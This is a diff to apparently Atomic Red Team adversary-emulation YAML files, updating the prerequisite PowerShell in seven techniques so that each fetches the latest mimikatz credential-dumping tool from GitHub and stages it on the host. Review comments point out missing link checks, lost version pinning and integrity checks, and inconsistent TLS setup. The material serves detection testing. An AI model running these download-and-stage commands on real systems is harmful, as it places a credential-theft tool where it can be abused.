diff --git a/atomics/T1003.001/T1003.001.yaml b/atomics/T1003.001/T1003.001.yaml
index 95a7a2f6..b3de5492 100644
--- a/atomics/T1003.001/T1003.001.yaml
+++ b/atomics/T1003.001/T1003.001.yaml
@@ -187,15 +187,8 @@ atomic_tests:
 if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1}
 get_prereq_command: |
 [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
- $url = 'https://github.com/gentilkiwi/mimikatz/releases/latest'
- $request = [System.Net.WebRequest]::Create($url)
- $response = $request.GetResponse()
- $realTagUrl = $response.ResponseUri.OriginalString
- $version = $realTagUrl.split('/')[-1]
- $fileName = 'mimikatz_trunk.zip'
- [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
- $realDownloadUrl =$realTagUrl.Replace('tag','download') + '/' + $fileName
- Invoke-WebRequest $realDownloadUrl -OutFile "$env:TEMP\Mimi.zip"
+ $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
+ Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\Mimi.zip"
 Expand-Archive $env:TEMP\Mimi.zip $env:TEMP\Mimi -Force
 New-Item -ItemType Directory (Split-Path #{mimikatz_exe}) -Force | Out-Null
 Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe #{mimikatz_exe} -Force
diff --git a/atomics/T1003.006/T1003.006.yaml b/atomics/T1003.006/T1003.006.yaml
index dd51330f..172d1834 100644
--- a/atomics/T1003.006/T1003.006.yaml
+++ b/atomics/T1003.006/T1003.006.yaml
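Review bot: Nothing in the T1003.001 hunk checks that `$mimikatz_relative_uri` holds exactly one link before it is spliced into the download URL on the second added line. If the releases page yields no anchor ending in `/mimikatz_trunk.zip`, the request becomes `https://github.com` and whatever comes back is written to `$env:TEMP\Mimi.zip`, so the failure only surfaces later in `Expand-Archive` with a misleading error; with more than one match the array would be interpolated space-joined into the URL. I would end the pipeline with `| Select-Object -First 1` and add `if (-not $mimikatz_relative_uri) { throw 'mimikatz_trunk.zip link not found on the releases page' }` before the download. The same two lines are added in the T1003.006, T1055, T1207, T1550.002, T1550.003 and T1558.001 hunks and need the same guard.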
@@ -32,7 +32,8 @@ atomic_tests:
 if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
 get_prereq_command: |
 $mimikatz_path = cmd /c echo #{mimikatz_path}
- Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
+ $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
+ Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\mimikatz.zip"
 Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
 New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
 Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force
diff --git a/atomics/T1055/T1055.yaml b/atomics/T1055/T1055.yaml
index e6ecea77..03615920 100644
--- a/atomics/T1055/T1055.yaml
+++ b/atomics/T1055/T1055.yaml
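Review bot: The T1003.006 prerequisite used to fetch a fixed release (`2.2.0-20200918-fix`); the added lines now take whatever `releases/latest` resolves to, and the archive is extracted and `mimikatz.exe` moved into place with no integrity check. That makes test runs non-reproducible and lets a changed or replaced upstream asset land on the test host unnoticed. I would keep a reviewed tag in the URL and verify the archive before `Expand-Archive`, for example `if ((Get-FileHash "$env:TEMP\mimikatz.zip" -Algorithm SHA256).Hash -ne '<EXPECTED_SHA256>') { throw 'mimikatz_trunk.zip hash mismatch' }`, where the hash shown is a placeholder for the value recorded when the tag was reviewed. The T1207, T1550.002, T1550.003 and T1558.001 hunks drop their pinned tags in the same way.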
@@ -63,8 +63,8 @@ atomic_tests:
 get_prereq_command: |
 $mimikatz_path = cmd /c echo #{mimikatz_path}
 [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
- $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
- Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -OutFile "$env:TEMP\mimikatz.zip"
+ $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
+ Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\mimikatz.zip"
 Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
 New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
 Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force
diff --git a/atomics/T1207/T1207.yaml b/atomics/T1207/T1207.yaml
index 7f38b3be..4e7df9db 100644
--- a/atomics/T1207/T1207.yaml
+++ b/atomics/T1207/T1207.yaml
@@ -46,7 +46,8 @@ atomic_tests:
 if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
 get_prereq_command: |
 $mimikatz_path = cmd /c echo #{mimikatz_path}
- Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
+ $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
+ Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\mimikatz.zip"
 Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
 New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
 Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force
diff --git a/atomics/T1550.002/T1550.002.yaml b/atomics/T1550.002/T1550.002.yaml
index 416e222d..2fc50b21 100644
--- a/atomics/T1550.002/T1550.002.yaml
+++ b/atomics/T1550.002/T1550.002.yaml
@@ -34,7 +34,8 @@ atomic_tests:
 if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
 get_prereq_command: |
 $mimikatz_path = cmd /c echo #{mimikatz_path}
- Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20210724/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
+ $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
+ Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\mimikatz.zip"
 Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
 New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
 Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force
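Review bot: In the T1207 hunk the first added `Invoke-WebRequest` runs directly after `$mimikatz_path = cmd /c echo #{mimikatz_path}` with no TLS 1.2 opt-in, although the T1003.001, T1055 and T1550.003 prerequisites in this same commit set it before their requests. On Windows PowerShell hosts whose .NET defaults do not offer TLS 1.2, the connection to github.com is likely to fail before any link is resolved. I would add `[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12` above the first request so all seven prerequisites behave the same. The T1003.006, T1550.002 and T1558.001 hunks show the same gap.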
diff --git a/atomics/T1550.003/T1550.003.yaml b/atomics/T1550.003/T1550.003.yaml
index e3539161..4953be47 100644
--- a/atomics/T1550.003/T1550.003.yaml
+++ b/atomics/T1550.003/T1550.003.yaml
@@ -28,7 +28,8 @@ atomic_tests:
 if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1}
 get_prereq_command: |
 [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
- Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\Mimi.zip"
+ $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
+ Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\Mimi.zip"
 Expand-Archive $env:TEMP\Mimi.zip $env:TEMP\Mimi -Force
 New-Item -ItemType Directory (Split-Path #{mimikatz_exe}) -Force | Out-Null
 Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe #{mimikatz_exe} -Force
diff --git a/atomics/T1558.001/T1558.001.yaml b/atomics/T1558.001/T1558.001.yaml
index 883b1fd4..cf55d773 100644
--- a/atomics/T1558.001/T1558.001.yaml
+++ b/atomics/T1558.001/T1558.001.yaml
@@ -39,7 +39,8 @@ atomic_tests:
 if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
 get_prereq_command: |
 $mimikatz_path = cmd /c echo #{mimikatz_path}
- Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
+ $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
+ Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\mimikatz.zip"
 Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
 New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
 Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force